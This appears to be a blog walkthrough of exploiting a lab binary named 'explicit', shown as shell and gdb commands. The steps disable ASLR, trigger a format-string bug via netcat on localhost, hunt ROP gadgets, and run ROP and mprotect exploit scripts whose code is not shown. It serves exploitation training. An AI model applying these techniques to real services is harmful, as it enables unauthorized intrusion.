# echo 0 > /proc/sys/kernel/randomize_va_space
# ./explicit
# gdb -q -p `ps axuf | grep explicit | head -n 1 | awk '{print $2}'`
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) continue
# nc 127.0.0.1 7070
%n
^C
(gdb) backtrace
(gdb) x/2i 0x0804f96f-0x5
(gdb) quit
# gdb -q -p `ps axuf | grep explicit | head -n 1 | awk '{print $2}'`
(gdb) break *0x806ea80
(gdb) continue
# nc 127.0.0.1 7070
%n
(gdb) x/xw $esp
(gdb) quit
# ./checksec.sh --file explicit
# gdb -q -x rop.py
# readelf --section-headers explicit | grep '\.bss'
# cat exploit.py
# ./exploit.py 127.0.0.1 7070 0xbffff59c
>
Another solution using mprotect (based on @esanfelix exploit)
# ./search_instructions.py /eXPLicit/explicit mov+eax,0x3 int+0x80
# read
# ./search_instructions.py /eXPLicit/explicit mov+eax,0x7d int+0x80
# mprotect
# gdb -q explicit
(gdb) x/10i 0x805ef4a
(gdb) x/10i 0x805fa30
# ./search_instructions.py /eXPLicit/explicit pop pop pop ret
# cat exploit-mprotect.py
# ./exploit-mprotect.py 127.0.0.1 7070 0xbffff59c
>
No comments:
Post a Comment